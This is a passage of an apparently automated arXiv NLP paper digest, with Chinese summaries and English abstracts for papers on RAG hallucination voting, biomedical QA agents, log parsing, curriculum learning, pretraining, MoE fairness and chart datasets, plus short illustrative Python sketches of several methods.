Abstract:Vision-language models (VLMs) excel at image-text retrieval yet persistently fail at compositional reasoning, distinguishing captions that share the same words but differ in relational structure. We present a unified evaluation and augmentation framework benchmarking four architecturally diverse VLMs (CLIP, BLIP, LLaVA, and Qwen3-VL-8B-Thinking) on the Winoground benchmark under plain and scene-graph-augmented regimes. We introduce a dependency-based TextSceneGraphParser (spaCy) extracting subject-relation-object triples, and a Graph Asymmetry Scorer using optimal bipartite matching to inject structural relational priors. Caption ablation experiments (subject-object masking and swapping) reveal that Qwen3-VL-8B-Thinking achieves a group score of 62.75, far above all encoder-based models, while a proposed multi-turn SG filtering strategy further lifts it to 66.0, surpassing prior open-source state-of-the-art. We analyze the capability-augmentation tradeoff and find that SG augmentation benefits already capable models while providing negligible or negative gains for weaker baselines. Code: this https URL
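The Graph Asymmetry Scorer idea, matching subject-relation-object triples between two captions one-to-one, can be sketched with a brute-force matcher. The per-slot similarity is a deliberately crude stand-in for whatever the framework actually uses; brute force over permutations replaces a proper assignment solver and only works for small triple sets.

```python
from itertools import permutations

def triple_similarity(t1, t2):
    """Per-slot overlap between two (subject, relation, object) triples."""
    return sum(a == b for a, b in zip(t1, t2)) / 3

def graph_match_score(triples_a, triples_b):
    """Best one-to-one assignment between two triple sets (brute force;
    a stand-in for optimal bipartite matching on small graphs)."""
    if not triples_a or not triples_b:
        return 0.0
    small, large = sorted([triples_a, triples_b], key=len)
    best = max(
        sum(triple_similarity(s, large[j]) for s, j in zip(small, perm))
        for perm in permutations(range(len(large)), len(small))
    )
    return best / max(len(triples_a), len(triples_b))
```

The score separates Winoground-style pairs: a caption matched against itself scores 1.0, while the same words with subject and object swapped score much lower because only the relation slot aligns.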
[NLP-67] PubMed Reason er: Dynamic Reasoning -based Retrieval for Evidence-Grounded Biomedical Question Answering
【速读】: 该论文旨在解决生物医学问答(Biomedical Question Answering, QA)系统在提供准确答案的同时,缺乏可验证证据支持和迭代优化能力的问题。现有检索增强方法难以动态改进初始查询质量,而自反思机制又仅在完整检索后才启动,导致效率与准确性受限。其解决方案的关键在于提出一种三阶段的生物医学QA代理——PubMed Reasoner:首先通过自我批判式查询优化(self-critic query refinement)基于部分元数据检索结果调整MeSH术语以提升查询覆盖度、对齐性和去重性;其次采用批处理式反思检索(reflective retrieval)持续获取文献直至满足证据充分性;最后生成基于证据的回答(evidence-grounded response generation),附带明确引用。该架构结合了检索优先的推理策略与大语言模型(LLM)驱动的判断机制,在PubMedQA上达到78.32%准确率,略优于人类专家,并在多个评估维度上展现出更强的推理合理性、证据锚定性、临床相关性及可信度。
链接: https://arxiv.org/abs/2603.27335
作者: Yiqing Zhang,Xiaozhong Liu,Fabricio Murai
机构: PayPal( PayPal); Worcester Polytechnic Institute (伍斯特理工学院)
类目: Computation and Language (cs.CL)
备注: 20 pages; under review
Abstract:Trustworthy biomedical question answering (QA) systems must not only provide accurate answers but also justify them with current, verifiable evidence. Retrieval-augmented approaches partially address this gap but lack mechanisms to iteratively refine poor queries, whereas self-reflection methods kick in only after full retrieval is completed. In this context, we introduce PubMed Reasoner, a biomedical QA agent composed of three stages: self-critic query refinement evaluates MeSH terms for coverage, alignment, and redundancy to enhance PubMed queries based on partial (metadata) retrieval; reflective retrieval processes articles in batches until sufficient evidence is gathered; and evidence-grounded response generation produces answers with explicit citations. PubMed Reasoner with a GPT-4o backbone achieves 78.32% accuracy on PubMedQA, slightly surpassing human experts, and showing consistent gains on MMLU Clinical Knowledge. Moreover, LLM-as-judge evaluations prefer our responses across: reasoning soundness, evidence grounding, clinical relevance, and trustworthiness. By orchestrating retrieval-first reasoning over authoritative sources, our approach provides practical assistance to clinicians and biomedical researchers while controlling compute and token costs.
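The batched reflective-retrieval stage reduces to a simple control pattern. In the sketch below, `fetch_batch` and `sufficient` are stand-ins for the PubMed query and the agent's LLM sufficiency judgment; nothing here reflects the system's actual interfaces.

```python
def reflective_retrieval(fetch_batch, sufficient, max_batches=10):
    """Accumulate article batches until an evidence-sufficiency check
    passes, an empty batch signals exhaustion, or the batch cap is hit.
    The cap bounds token and compute cost."""
    evidence = []
    for i in range(max_batches):
        batch = fetch_batch(i)
        if not batch:
            break
        evidence.extend(batch)
        if sufficient(evidence):
            break
    return evidence
```

Stopping as soon as the evidence is judged sufficient is what lets the agent control retrieval cost instead of always reading every hit.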
[NLP-68] SACRED: A Faithful Annotated Multimedia Multimodal Multilingual Dataset for Classifying Connectedness Types in Online Spirituality LREC
【速读】: 该论文旨在解决宗教与神学研究中精神层面(spirituality)概念在跨文化语境下难以量化分析的问题,尤其针对社会科学研究中高质量多模态数据集稀缺的困境。其解决方案的关键在于与社会科学家合作构建了首个面向在线灵性交流的标注多模态数据集SACRED,该数据集确保分类标签的忠实性,并在此基础上系统评估了13种主流大语言模型(LLM)及传统规则和微调方法在抽象概念识别中的表现,发现DeepSeek-V3在文本分类任务中表现最优(Quora测试集准确率79.19%),而GPT-4o-mini在视觉任务中领先(F1分数63.99%)。这一成果为灵性通信研究提供了可复现的数据基础与方法论支持。
链接: https://arxiv.org/abs/2603.27331
作者: Qinghao Guan,Yuchen Pan,Donghao Li,Zishi Zhang,Yiyang Chen,Lu Li,Flaminia Canu,Emilia Volkart,Gerold Schneider
机构: 未知
类目: Computation and Language (cs.CL); Multimedia (cs.MM)
备注: Accepted by LLMs4SSH 2026 at LREC
Abstract:In religion and theology studies, spirituality has garnered significant research attention because it not only transcends culture but also offers a unique experience to each individual. However, social scientists often rely on limited datasets, which are basically unavailable online. In this study, we collaborated with social scientists to develop a high-quality multimedia multi-modal dataset, SACRED, in which the faithfulness of classification is guaranteed. Using SACRED, we evaluated the performance of 13 popular LLMs as well as traditional rule-based and fine-tuned approaches. The results suggest that the DeepSeek-V3 model performs well in classifying such abstract concepts (i.e., 79.19% accuracy in the Quora test set), and the GPT-4o-mini model surpassed the other models in the vision tasks (63.99% F1 score). To the best of our knowledge, this is the first annotated multi-modal dataset from online spirituality communication. Our study also found a new type of connectedness which is valuable for communication science studies.
[NLP-69] Self-evolving AI agents for protein discovery and directed evolution
【速读】: 该论文旨在解决蛋白质科学发现中因人工协调信息与算法而导致的瓶颈问题,以及通用智能体在复杂领域项目中表现不足的局限性。其解决方案的关键在于提出VenusFactory2这一自主框架,通过自演化多智能体基础设施实现从静态工具调用到动态工作流合成的转变,从而仅凭单一自然语言提示即可自主完成蛋白质的发现与优化流程。
链接: https://arxiv.org/abs/2603.27303
作者: Yang Tan,Lingrong Zhang,Mingchen Li,Yuanxi Yu,Bozitao Zhong,Bingxin Zhou,Nanqing Dong,Liang Hong
机构: 未知
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Quantitative Methods (q-bio.QM)
备注: 100 pages, 6 figures
Abstract:Protein scientific discovery is bottlenecked by the manual orchestration of information and algorithms, while general agents are insufficient in complex domain projects. VenusFactory2 provides an autonomous framework that shifts from static tool usage to dynamic workflow synthesis via a self-evolving multi-agent infrastructure to address protein-related demands. It outperforms a set of well-known agents on the VenusAgentEval benchmark, and autonomously organizes the discovery and optimization of proteins from a single natural language prompt.
[NLP-70] Mitigating Hallucination on Hallucination in RAG via Ensemble Voting
【速读】: 该论文旨在解决检索增强生成(Retrieval-Augmented Generation, RAG)系统中“幻觉叠加”(hallucination on hallucination)的问题,即由于检索结果本身存在错误或偏差,导致生成模型基于这些错误信息进一步产生更严重的幻觉。解决方案的关键在于提出一种无需训练的两阶段投票框架VOTE-RAG:第一阶段为检索投票(Retrieval Voting),多个代理并行生成多样化查询,并聚合所有检索到的文档;第二阶段为响应投票(Response Voting),多个代理独立基于聚合后的文档生成答案,最终输出由多数投票决定。该方法通过简单而可靠的集成投票机制,在不引入问题漂移(problem drift)风险的前提下,显著提升了RAG系统的鲁棒性和准确性。
链接: https://arxiv.org/abs/2603.27253
作者: Zequn Xie,Zhengyang Sun
机构: 未知
类目: Computation and Language (cs.CL)
备注: arXiv admin note: text overlap with arXiv:2505.18581 by other authors
Abstract:Retrieval-Augmented Generation (RAG) aims to reduce hallucinations in Large Language Models (LLMs) by integrating external knowledge. However, RAG introduces a critical challenge: "hallucination on hallucination," where flawed retrieval results mislead the generation model, leading to compounded hallucinations. To address this issue, we propose VOTE-RAG, a novel, training-free framework with a two-stage structure and efficient, parallelizable voting mechanisms. VOTE-RAG includes: (1) Retrieval Voting, where multiple agents generate diverse queries in parallel and aggregate all retrieved documents; (2) Response Voting, where multiple agents independently generate answers based on the aggregated documents, with the final output determined by majority vote. We conduct comparative experiments on six benchmark datasets. Our results show that VOTE-RAG achieves performance comparable to or surpassing more complex frameworks. Additionally, VOTE-RAG features a simpler architecture, is fully parallelizable, and avoids the "problem drift" risk. Our work demonstrates that simple, reliable ensemble voting is a superior and more efficient method for mitigating RAG hallucinations.
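VOTE-RAG 的两阶段投票机制本身很简单,可用如下示意代码还原其控制流。这是按摘要描述写的假设性草图:`retrieve` 与各代理均为调用方注入的占位函数,并非论文实现。

```python
from collections import Counter

def retrieval_voting(query_agents, retrieve):
    """阶段一(Retrieval Voting):各代理并行生成多样化查询,
    聚合全部检索结果并去重(dict.fromkeys 去重且保持顺序)。"""
    docs = []
    for make_query in query_agents:
        docs.extend(retrieve(make_query()))
    return list(dict.fromkeys(docs))

def response_voting(answer_agents, docs):
    """阶段二(Response Voting):各代理基于同一聚合文档集独立作答,
    最终输出由多数投票决定。"""
    answers = [agent(docs) for agent in answer_agents]
    return Counter(answers).most_common(1)[0][0]

def vote_rag(query_agents, answer_agents, retrieve):
    docs = retrieval_voting(query_agents, retrieve)
    return response_voting(answer_agents, docs)
```

由于两阶段内的代理互不依赖,整个流程天然可并行,这正是摘要强调的"fully parallelizable"。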
[NLP-71] SCOPE: Tree-based Self-Correcting Online Log Parsing via Syntactic-Semantic Collaboration
【速读】: 该论文旨在解决日志解析(log parsing)中传统启发式方法准确率低与基于大语言模型(LLM)的方法延迟高的矛盾问题。其关键解决方案是提出SCOPE,一种自校正的在线日志解析方法,通过引入双向树结构实现从正向和反向的高效模板匹配,提升整体匹配率;同时采用两阶段语法语义协同框架——首先利用轻量级自然语言处理(NLP)模型结合词性标注(POS)进行语法层面匹配,仅在存在不确定性时才调用LLM作为后援处理语义复杂案例,从而显著减少LLM API调用次数,在保持高准确率的同时大幅提升效率。
链接: https://arxiv.org/abs/2603.27247
作者: Dongyi Fan,Suqiong Zhang,Lili He,Ming Liu,Yifan Huo
机构: Zhejiang Sci-Tech University (浙江理工大学)
类目: Computation and Language (cs.CL); Software Engineering (cs.SE)
备注: Accepted at the 34th International Conference on Program Comprehension (ICPC 2026)
Abstract:Log parsing is a critical step for automated log analysis in complex systems. Traditional heuristic-based methods offer high efficiency but are limited in accuracy due to overlooking semantic context. In contrast, recent LLM-based parsers improve accuracy via semantic understanding but incur high latency from frequent model calls. To address this, we propose SCOPE, the first self-correcting online log parsing method that integrates the strengths of both heuristic and LLM-based paradigms. SCOPE introduces a novel bi-directional tree structure that enables efficient template matching from both forward and reverse directions, resulting in a higher overall matching rate. Additionally, it adopts a two-stage syntactic-semantic collaboration framework: a lightweight NLP model first utilizes part-of-speech (POS) information for syntax-based matching, while the LLM is selectively invoked as a fallback to handle semantically complex cases when uncertainty remains. This design significantly reduces LLM API usage while maintaining high accuracy, achieving a balance between efficiency and effectiveness. Extensive evaluations on diverse benchmark datasets show that SCOPE outperforms state-of-the-art methods in both accuracy and efficiency. The implementation and datasets are publicly released to facilitate further research.
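SCOPE 的核心节流思想——"语法匹配优先、LLM 仅作不确定时的后援"——可以用几行代码说明。以下为假设性示意:`syntax_match` 与 `llm_parse` 均为占位函数,置信度阈值 0.8 也是举例取值,并非论文的实际接口。

```python
def scope_parse(log_line, syntax_match, llm_parse, conf_threshold=0.8):
    """两阶段语法-语义协同解析:
    1) 轻量 NLP/POS 语法匹配,返回 (模板, 置信度);
    2) 仅当置信度低于阈值时才回退调用 LLM,从而减少 API 次数。"""
    template, confidence = syntax_match(log_line)
    if confidence >= conf_threshold:
        return template, "syntax"
    return llm_parse(log_line), "llm"
```

在线场景下,大多数日志行能被第一阶段吸收,LLM 调用只发生在少数语义复杂的长尾样本上,这就是效率与准确率得以兼顾的原因。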
[NLP-72] Structural Stress and Learned Helplessness in Afghanistan: A Multi-Layer Analysis of the AFSTRESS Dari Corpus
【速读】: 该论文旨在解决在阿富汗人道主义危机背景下,缺乏针对达里语(Dari)自述压力叙事的多标签语料库问题,从而推动对压力源、情绪状态及心理机制(如习得性无助、慢性压力和情感级联模式)的跨层次分析。其解决方案的关键在于构建了AFSTRESS——首个达里语自述压力叙事多标签语料库,包含737份来自阿富汗个体的响应,涵盖12个二元标签(5种情绪与7种压力源),具有高标签基数(5.54)和密度(0.462),反映了复杂且多维的压力特征;同时通过字符级TF-IDF结合线性支持向量机(Linear SVM)实现了基准性能(Micro-F1 = 0.663,Macro-F1 = 0.651),并验证了阈值调优可显著提升模型效果(Micro-F1提升10.3点),为计算语言学、社会结构分析与心理学建模提供了首个可扩展的数据资源与方法框架。
链接: https://arxiv.org/abs/2603.27233
作者: Jawid Ahmad Baktash,Mursal Dawodi,Nadira Ahmadi
机构: 未知
类目: Computation and Language (cs.CL); Social and Information Networks (cs.SI)
备注: 16 pages, 7 figures, 3 tables. Introduces AFSTRESS, the first multi-label Dari corpus of self-reported stress narratives (737 responses). Includes computational benchmarks, social science analysis of structural stress, and psychological modeling (learned helplessness, chronic stress, emotional cascade)
Abstract:We introduce AFSTRESS, the first multi-label corpus of self-reported stress narratives in Dari (Eastern Persian), comprising 737 responses collected from Afghan individuals during an ongoing humanitarian crisis. Participants describe experienced stress and select emotion and stressor labels via Dari checklists. The dataset enables analysis at three levels: computational (multi-label classification), social (structural drivers and gender disparities), and psychological (learned helplessness, chronic stress, and emotional cascade patterns). It includes 12 binary labels (5 emotions, 7 stressors), with high label cardinality (5.54) and density (0.462), reflecting complex, multi-dimensional stress. Structural stressors dominate: uncertain future (62.6 percent) and education closure (60.0 percent) exceed emotional states, indicating stress is primarily structurally driven. The strongest co-occurrence is between hopelessness and uncertain future (J = 0.388). Baseline experiments show that character TF-IDF with Linear SVM achieves Micro-F1 = 0.663 and Macro-F1 = 0.651, outperforming ParsBERT and XLM-RoBERTa, while threshold tuning improves Micro-F1 by 10.3 points. AFSTRESS provides the first Dari resource for computational analysis of stress and well-being in a crisis-affected population.
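摘要提到阈值调优使 Micro-F1 提升 10.3 个百分点。多标签场景下的 Micro-F1 与阈值网格搜索可以用纯 Python 勾勒如下(假设性示意,仅演示指标与调优逻辑,非论文代码;实践中通常直接用 scikit-learn 的 `f1_score(average='micro')`):

```python
def micro_f1(y_true, y_pred):
    """多标签 Micro-F1:对所有"样本 x 标签"对统一累计 TP/FP/FN 后计算。"""
    tp = fp = fn = 0
    for ts, ps in zip(y_true, y_pred):
        for t, p in zip(ts, ps):
            if p and t:
                tp += 1
            elif p and not t:
                fp += 1
            elif t and not p:
                fn += 1
    denom = 2 * tp + fp + fn
    return 2 * tp / denom if denom else 0.0

def tune_threshold(y_true, scores, grid=(0.3, 0.4, 0.5, 0.6, 0.7)):
    """在验证集上网格搜索判定阈值,使 Micro-F1 最大化。
    scores 为分类器输出的每标签打分(如 SVM 决策值归一化后)。"""
    def f1_at(th):
        preds = [[s >= th for s in row] for row in scores]
        return micro_f1(y_true, preds)
    return max(grid, key=f1_at)
```

在标签密度较高(0.462)的数据上,统一的 0.5 阈值往往不是最优,这也解释了为何简单调优就能带来可观增益。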
[NLP-73] Rethinking Easy-to-Hard: Limits of Curriculum Learning in Post-Training for Deductive Reasoning
【速读】: 该论文旨在解决课程学习(Curriculum Learning, CL)在大语言模型(Large Language Models, LLMs)后训练阶段对组合推理任务是否真正有效的问题。传统观点认为,按难度递增顺序组织训练样本有助于提升模型的泛化能力,尤其在涉及复杂推理任务时;然而,这一假设在组合推理场景下的实证支持不足。论文的关键解决方案是设计了一套系统性的实证研究,采用合成算术和逻辑基准测试,以推理复杂度而非表面特征作为难度指标,对比了基于难度排序的课程学习与标准随机采样策略在监督微调(Supervised Fine-Tuning, SFT)和强化学习(Reinforcement Learning, RL)两种训练范式下的性能差异。结果表明,在准确率和响应长度上均未发现课程学习具有显著优势,从而揭示出在演绎推理任务中,训练样本的具体排序对实现组合泛化几乎无影响,挑战了课程学习在后训练阶段的实际价值。
链接: https://arxiv.org/abs/2603.27226
作者: Maximilian Mordig,Andreas Opedal,Weiyang Liu,Bernhard Schölkopf
机构: Max Planck Institute for Intelligent Systems, Tübingen (马克斯普朗克智能系统研究所, 图宾根); ETH Zürich (苏黎世联邦理工学院); The Chinese University of Hong Kong (香港中文大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:Curriculum learning (CL), motivated by the intuition that learning in increasing order of difficulty should ease generalization, is commonly adopted both in pre-training and post-training of large language models (LLMs). The intuition of CL is particularly compelling for compositional reasoning, where complex problems are built from elementary inference rules; however, the actual impact of CL on such tasks remains largely underexplored. We present a systematic empirical study of CL for post-training of LLMs, using synthetic arithmetic and logical benchmarks where difficulty is characterized by reasoning complexity rather than surface-level proxies. Surprisingly, across multiple model families and curriculum schedules, we find no robust advantage in difficulty-based sequencing over standard random sampling in either accuracy or response length. These findings persist across both supervised fine-tuning (SFT) and reinforcement learning (RL) methods. Our study suggests that, in the context of deductive reasoning, the specific ordering of training examples plays a negligible role in achieving compositional generalization, challenging the practical utility of curriculum-based post-training.
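论文对比的两种训练样本排序策略本质上只差一行代码。以下为假设性示意:以"推理步数"作为难度代理(对应文中"以推理复杂度而非表面特征刻画难度"),`examples` 的字段结构为演示而设。

```python
import random

def difficulty(example):
    """难度代理:推理步数(合成算术/逻辑题中可直接由构造过程得到)。"""
    return example["steps"]

def curriculum_order(examples):
    """课程学习:按难度从易到难排序后送入 SFT/RL 训练。"""
    return sorted(examples, key=difficulty)

def random_order(examples, seed=0):
    """基线:标准随机采样顺序。论文发现二者在准确率与响应长度上无稳健差异。"""
    shuffled = list(examples)
    random.Random(seed).shuffle(shuffled)
    return shuffled
```

实验的核心发现是:在演绎推理的后训练中,换用 `curriculum_order` 并不会比 `random_order` 带来可复现的收益。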
[NLP-74] LightMover: Generative Light Movement with Color and Intensity Controls CVPR2026
【速读】: 该论文旨在解决单张图像中可控光照编辑的问题,即在不重新渲染场景的前提下,实现对光源位置、颜色和强度的精确控制,并生成物理上合理的阴影、反射和衰减效果。解决方案的关键在于提出 LightMover 框架,其将光照编辑建模为视觉 token 空间中的序列到序列预测问题,利用视频扩散先验(video diffusion priors)学习光照变化与场景响应之间的映射关系;同时引入自适应 token 剪枝机制,在保留空间信息的同时压缩非空间属性编码,使控制序列长度减少 41% 而不损失编辑保真度,从而实现高效且物理合理的光照操控。
链接: https://arxiv.org/abs/2603.27209
作者: Gengze Zhou,Tianyu Wang,Soo Ye Kim,Zhixin Shu,Xin Yu,Yannick Hold-Geoffroy,Sumit Chaturvedi,Qi Wu,Zhe Lin,Scott Cohen
机构: AIML, Adelaide University; Adobe Research; University of Hong Kong; Yale University
类目: Computer Vision and Pattern Recognition (cs.CV); Computation and Language (cs.CL); Graphics (cs.GR); Machine Learning (cs.LG)
备注: CVPR 2026. 10 pages, 5 figures, 6 tables in main paper; supplementary material included
Abstract:We present LightMover, a framework for controllable light manipulation in single images that leverages video diffusion priors to produce physically plausible illumination changes without re-rendering the scene. We formulate light editing as a sequence-to-sequence prediction problem in visual token space: given an image and light-control tokens, the model adjusts light position, color, and intensity together with resulting reflections, shadows, and falloff from a single view. This unified treatment of spatial (movement) and appearance (color, intensity) controls improves both manipulation and illumination understanding. We further introduce an adaptive token-pruning mechanism that preserves spatially informative tokens while compactly encoding non-spatial attributes, reducing control sequence length by 41% while maintaining editing fidelity. To train our framework, we construct a scalable rendering pipeline that generates large numbers of image pairs across varied light positions, colors, and intensities while keeping the scene content consistent with the original image. LightMover enables precise, independent control over light position, color, and intensity, and achieves high PSNR and strong semantic consistency (DINO, CLIP) across different tasks.
[NLP-75] daVinci-LLM: Towards the Science of Pretraining
【速读】: 该论文旨在解决预训练(pretraining)阶段在大模型能力构建中的关键作用长期被忽视的问题,即当前研究普遍依赖后训练(post-training)优化,而未能系统性地探索预训练本身对模型能力上限的决定性影响。其解决方案的核心在于通过一个工业级算力与完全科研自由相结合的开放范式(daVinci-LLM),实现从数据处理到训练过程的全流程透明化,首次将“数据达尔文主义”(Data Darwinism)框架引入预训练研究,提出一套从过滤到合成的L0-L9分层分类方法,并设计两阶段自适应课程学习策略,结合200余次受控消融实验,揭示了数据处理深度、领域饱和动态、组合平衡等维度对模型能力提升的系统性影响,从而为预训练科学提供了可复现、可积累的方法论基础。
链接: https://arxiv.org/abs/2603.27164
作者: Yiwei Qin,Yixiu Liu,Tiantian Mi,Muhang Xie,Zhen Huang,Weiye Si,Pengrui Lu,Siyuan Feng,Xia Wu,Liming Liu,Ye Luo,Jinlong Hou,Qipeng Guo,Yu Qiao,Pengfei Liu
机构: 未知
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注:
Abstract:The foundational pretraining phase determines a model’s capability ceiling, as post-training struggles to overcome capability foundations established during pretraining, yet it remains critically under-explored. This stems from a structural paradox: organizations with computational resources operate under commercial pressures that inhibit transparent disclosure, while academic institutions possess research freedom but lack pretraining-scale computational resources. daVinci-LLM occupies this unexplored intersection, combining industrial-scale resources with full research freedom to advance the science of pretraining. We adopt a fully-open paradigm that treats openness as scientific methodology, releasing complete data processing pipelines, full training processes, and systematic exploration results. Recognizing that the field lacks systematic methodology for data processing, we employ the Data Darwinism framework, a principled L0-L9 taxonomy from filtering to synthesis. We train a 3B-parameter model from random initialization across 8T tokens using a two-stage adaptive curriculum that progressively shifts from foundational capabilities to reasoning-intensive enhancement. Through 200+ controlled ablations, we establish that: processing depth systematically enhances capabilities, establishing it as a critical dimension alongside volume scaling; different domains exhibit distinct saturation dynamics, necessitating adaptive strategies from proportion adjustments to format shifts; compositional balance enables targeted intensification while preventing performance collapse; and evaluation protocol choices shape our understanding of pretraining progress. By releasing the complete exploration process, we enable the community to build upon our findings and systematic methodologies to form accumulative scientific knowledge in pretraining.
[NLP-76] Learning to Predict Future-Aligned Research Proposals with Language Models
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在科研创意生成中缺乏有效评估机制的问题,尤其是如何自动衡量生成研究提案的创新性(novelty)与合理性(soundness),而传统大规模人工评估成本高昂。其核心解决方案是将提案生成重构为一个时间切片的科学预测任务:给定截止时间前可用的研究问题和启发文献,模型生成结构化提案,并通过其是否能提前预测后续发表论文中出现的研究方向来评估质量。关键创新在于提出未来对齐分数(Future Alignment Score, FAS),利用检索和LLM语义评分机制,在保留时间一致性的数据集上量化模型对未来研究趋势的预判能力,从而实现高效、可验证的模型优化与评估。
链接: https://arxiv.org/abs/2603.27146
作者: Heng Wang,Pengcheng Jiang,Jiashuo Sun,Zhiyi Shi,Haofei Yu,Jiawei Han,Heng Ji
机构: University of Illinois Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校)
类目: Computation and Language (cs.CL)
备注:
Abstract:Large language models (LLMs) are increasingly used to assist ideation in research, but evaluating the quality of LLM-generated research proposals remains difficult: novelty and soundness are hard to measure automatically, and large-scale human evaluation is costly. We propose a verifiable alternative by reframing proposal generation as a time-sliced scientific forecasting problem. Given a research question and inspiring papers available before a cutoff time, the model generates a structured proposal and is evaluated by whether it anticipates research directions that appear in papers published after the time. We operationalize this objective with the Future Alignment Score (FAS), computed via retrieval and LLM-based semantic scoring against a held-out future corpus. To train models, we build a time-consistent dataset of 17,771 papers from targets and their pre-cutoff citations, and synthesize reasoning traces that teach gap identification and inspiration borrowing. Across Llama-3.1 and Qwen2.5 models, future-aligned tuning improves future alignment over unaligned baselines (up to +10.6% overall FAS), and domain-expert human evaluation corroborates improved proposal quality. Finally, we demonstrate practical impact by implementing two model-generated proposals with a code agent, obtaining 4.17% accuracy gain on MATH from a new prompting strategy and consistent improvements for a novel model-merging method.
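未来对齐分数(FAS)的思想——把生成的提案与截止时间之后发表的论文做相似度匹配——可以用一个极简代理来说明。以下为假设性草图:用词袋余弦相似度代替论文中的"检索 + LLM 语义评分",top-k 均值也只是一种可能的聚合方式,并非论文的实际实现。

```python
import math
from collections import Counter

def _bow(text):
    """词袋向量(小写分词计数),作为语义表示的粗糙代理。"""
    return Counter(text.lower().split())

def _cosine(a, b):
    num = sum(a[w] * b[w] for w in a)
    den = (math.sqrt(sum(v * v for v in a.values()))
           * math.sqrt(sum(v * v for v in b.values())))
    return num / den if den else 0.0

def future_alignment_score(proposal, future_corpus, top_k=3):
    """对截止时间之后的每篇论文打相似度分,取 top-k 均值作为 FAS 代理。"""
    sims = sorted((_cosine(_bow(proposal), _bow(p)) for p in future_corpus),
                  reverse=True)
    top = sims[:top_k]
    return sum(top) / len(top) if top else 0.0
```

时间切片是这里的关键约束:`future_corpus` 必须严格由截止时间之后发表的论文组成,模型生成时不可见,否则"预测"退化为检索。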
[NLP-77] Routing Sensitivity Without Controllability: A Diagnostic Study of Fairness in MoE Language Models
【速读】: 该论文旨在解决混合专家(Mixture-of-Experts, MoE)语言模型在路由层面存在对人口统计学内容的敏感性,但如何利用这种敏感性实现公平性控制仍面临结构性限制的问题。解决方案的关键在于提出公平感知路由均衡(Fairness-Aware Routing Equilibrium, FARE)诊断框架,通过系统性评估不同MoE架构下路由级刻板印象干预的可行性与有效性,揭示路由偏好调整在某些模型中不可实现、统计上不稳健或伴随显著性能代价(如OLMoE在CrowS-Pairs指标上下降4.4个百分点),且即使在对数似然层面偏好变化稳定,也无法转化为生成层面的公平性改善——根本原因在于群体层面的专家掩码显示偏见与核心知识在专家组内深度纠缠。这表明路由敏感性虽为必要条件,但不足以实现有效的刻板印象控制,并指出了未来更可控MoE系统设计所需的具体架构条件。
链接: https://arxiv.org/abs/2603.27141
作者: Junhyeok Lee,Kyu Sung Choi
机构: Seoul National University College of Medicine (首尔国立大学医学院); Seoul National University Hospital (首尔国立大学医院); Healthcare AI Research Institute, Seoul National University Hospital (首尔国立大学医院健康AI研究所)
类目: Computation and Language (cs.CL)
备注: 10 pages, 2 figures, 8 tables
Abstract:Mixture-of-Experts (MoE) language models are universally sensitive to demographic content at the routing level, yet exploiting this sensitivity for fairness control is structurally limited. We introduce Fairness-Aware Routing Equilibrium (FARE), a diagnostic framework designed to probe the limits of routing-level stereotype intervention across diverse MoE architectures. FARE reveals that routing-level preference shifts are either unachievable (Mixtral, Qwen1.5, Qwen3), statistically non-robust (DeepSeekMoE), or accompanied by substantial utility cost (OLMoE, -4.4%p CrowS-Pairs at -6.3%p TQA). Critically, even where log-likelihood preference shifts are robust, they do not transfer to decoded generation: expanded evaluations on both non-null models yield null results across all generation metrics. Group-level expert masking reveals why: bias and core knowledge are deeply entangled within expert groups. These findings indicate that routing sensitivity is necessary but insufficient for stereotype control, and identify specific architectural conditions that can inform the design of more controllable future MoE systems.
[NLP-78] Story2Proposal: A Scaffold for Structured Scientific Paper Writing
【速读】: 该论文旨在解决生成式 AI (Generative AI) 在科学文献撰写过程中因缺乏结构化约束而导致的文档生命周期内叙事逻辑、实验证据与可视化元素之间出现不一致的问题,例如结构漂移、图表缺失或跨章节矛盾。其解决方案的关键在于提出一种基于契约(contract)的多智能体框架 Story2Proposal,通过一组协作智能体(架构师、写作者、精炼者和渲染器)围绕一个持久的共享视觉契约状态运行,该契约持续追踪章节结构和注册的视觉元素;同时引入评估智能体在“生成-评估-适应”循环中提供反馈并动态更新契约,从而实现对生成内容的结构一致性与视觉对齐性的有效控制。
链接: https://arxiv.org/abs/2603.27065
作者: Zhuoyang Qian,Wei Shi,Xu Lin,Li Ling,Meng Luo,Ziming Wang,Zhiwei Zhang,Tengyue Xu,Gaoge Liu,Zhentao Zhang,Shuo Zhang,Ziqi Wang,Zheng Feng,Yan Luo,Shu Xu,Yongjin Chen,Zhibo Feng,Zhuo Chen,Bruce Yuan,Biao Wu,Harry Wang,Kris Chen
机构: 未知
类目: Computation and Language (cs.CL)
备注: 10 pages, 4 figures
Abstract:Generating scientific manuscripts requires maintaining alignment between narrative reasoning, experimental evidence, and visual artifacts across the document lifecycle. Existing language-model generation pipelines rely on unconstrained text synthesis with validation applied only after generation, often producing structural drift, missing figures or tables, and cross-section inconsistencies. We introduce Story2Proposal, a contract-governed multi-agent framework that converts a research story into a structured manuscript through coordinated agents operating under a persistent shared visual contract. The system organizes architect, writer, refiner, and renderer agents around a contract state that tracks section structure and registered visual elements, while evaluation agents supply feedback in a generate-evaluate-adapt loop that updates the contract during generation. Experiments on tasks derived from the Jericho research corpus show that Story2Proposal achieved an expert evaluation score of 6.145 versus 3.963 for DirectChat (+2.182) across GPT, Claude, Gemini, and Qwen backbones. Compared with the structured generation baseline Fars, Story2Proposal obtained an average score of 5.705 versus 5.197, indicating improved structural consistency and visual alignment.
[NLP-79] ChartNet: A Million-Scale High-Quality Multimodal Dataset for Robust Chart Understanding CVPR2026
【速读】: 该论文旨在解决当前视觉语言模型(Vision-Language Models, VLMs)在图表理解与推理能力上的局限性,即模型难以联合处理几何视觉模式、结构化数值数据和自然语言信息以实现对图表的深入理解。其解决方案的关键在于构建ChartNet——一个高质量、百万规模的多模态数据集,通过代码引导的合成流水线生成150万张涵盖24种图表类型和6个绘图库的多样化样本,每个样本包含渲染图像、数据表格、自然语言摘要、问答对及推理链,实现细粒度跨模态对齐,并辅以严格的质量过滤机制保障视觉保真度、语义准确性和多样性,从而为多模态大模型提供大规模监督信号,提升其在数据可视化理解任务中的泛化能力和鲁棒性。
链接: https://arxiv.org/abs/2603.27064
